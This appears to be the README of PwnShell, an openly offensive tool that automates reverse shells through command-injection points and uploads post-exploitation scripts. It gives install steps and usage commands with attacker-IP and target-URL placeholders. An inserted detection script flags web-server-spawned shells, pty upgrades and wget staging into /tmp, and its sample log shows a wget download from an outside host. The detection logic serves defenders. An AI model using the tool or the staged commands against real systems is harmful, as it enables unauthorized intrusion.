PwnShell
Command execution exploiter with automatic connection handling
PwnShell is a tool that helps you get a reverse shell and upload post-exploitation scripts to the target machine instead of wasting your time with the regular CTF stuff... just confirm the injection point and feed it to this dumb tool.
- Brute-forces the vulnerable parameter
- Receives and handles the connection
- Downloads post-exploitation scripts from their repos
- Uploads them to the target
- Activates a TTY shell using Python3
- Enjoy!
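Seen from the target host, the steps listed above leave process-creation traces. The detection logic below is an added example, not part of PwnShell or written by its authors; the key=value log format, the account and process names, and the assumption that scripts reach the target through wget or curl into a world-writable directory are all illustrative.

```python
import re

# Constructed process-creation events for illustration; the log format is an assumption.
SAMPLE_EVENTS = """\
ts=12:00:01 user=www-data parent=apache2 exe=/bin/sh cmd=sh -c id
ts=12:00:03 user=www-data parent=sh exe=/usr/bin/python3 cmd=python3 -c import pty; pty.spawn("/bin/bash")
ts=12:00:09 user=www-data parent=bash exe=/usr/bin/wget cmd=wget http://203.0.113.5/enum.sh -O /tmp/enum.sh
ts=12:01:00 user=alice parent=bash exe=/usr/bin/python3 cmd=python3 manage.py runserver
ts=12:02:00 user=www-data parent=apache2 exe=/usr/sbin/apache2 cmd=apache2 -k start
"""

LINE = re.compile(r"^ts=(\S+) user=(\S+) parent=(\S+) exe=(\S+) cmd=(.*)$")
WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}   # assumed web server process names
WEB_USERS = {"www-data", "apache", "nginx"}              # assumed web service accounts
SHELLS = {"sh", "bash", "dash", "python3", "perl"}
FETCHERS = {"wget", "curl"}
DROP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

def classify(user, parent, exe, cmd):
    """Return the names of the rules that one event matches."""
    name = exe.rsplit("/", 1)[-1]
    hits = []
    # Command execution: the web server itself starts a shell or interpreter.
    if parent in WEB_PARENTS and name in SHELLS:
        hits.append("web-server-spawned-shell")
    # TTY step: a web service account allocates a pseudo-terminal from Python.
    if user in WEB_USERS and name.startswith("python") and "pty.spawn" in cmd:
        hits.append("pty-upgrade")
    # Script staging: a web service account fetches a file into a world-writable dir.
    if user in WEB_USERS and name in FETCHERS and any(d in cmd for d in DROP_DIRS):
        hits.append("tool-staging")
    return hits

def detect(log_text):
    """Parse key=value lines and return (timestamp, rule) for every match."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # skip lines that are not in the expected format
        ts, user, parent, exe, cmd = m.groups()
        alerts.extend((ts, rule) for rule in classify(user, parent, exe, cmd))
    return alerts

if __name__ == "__main__":
    for ts, rule in detect(SAMPLE_EVENTS):
        print(ts, rule)
```

Any one of the three rules firing alone can be benign admin activity; the three in sequence under the same web account within seconds is the pattern worth alerting on.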
Navigation:
- Installation
- Usage
- Contact
- Acknowledgements
Installation:
- Clone the repo
git clone https://github.com/zAbuQasem/PwnShell
- Install the dependencies
cd PwnShell/
pip3 install -r requirements.txt
- Make the script executable
chmod +x pwnshell.py
Usage:
Request-File Method [Recommended] 👇
./pwnshell.py -i [Attacker-IP] -f [REQUEST FILE] -s (To use https prefix)
Example:
- Copy the request from Burp or the browser's Network tab
- Replace the vulnerable part of the parameter with 'PWNME'
GET /Vulnerable.php?cmd=PWNME HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
URL Method 👇
./pwnshell.py -i [Attacker-IP] -p [Attacker-Port] -u [TARGET-URL] -m [REQUEST-METHOD] -c [COOKIES (optional)] -H [HEADERS (optional)]
# Note: Cookies and headers must be in JSON format (if provided).
./pwnshell.py -i [Attacker-IP] -u http/s://<TARGET>/vulnerable.php?cmd=PWNME --method GET --cookies '{"key" : "value"}'
Example:
- Replace the vulnerable part of the parameter with 'PWNME'
./pwnshell.py -i 127.0.0.1 -u http://10.10.10.10/vulnerable.php?cmd=PWNME
Preview:
Using [Request-File Method]
Using [URL Method]
Contact:
Zeyad AbuQasem - LinkedIn
Omar Albalouli - LinkedIn & GitHub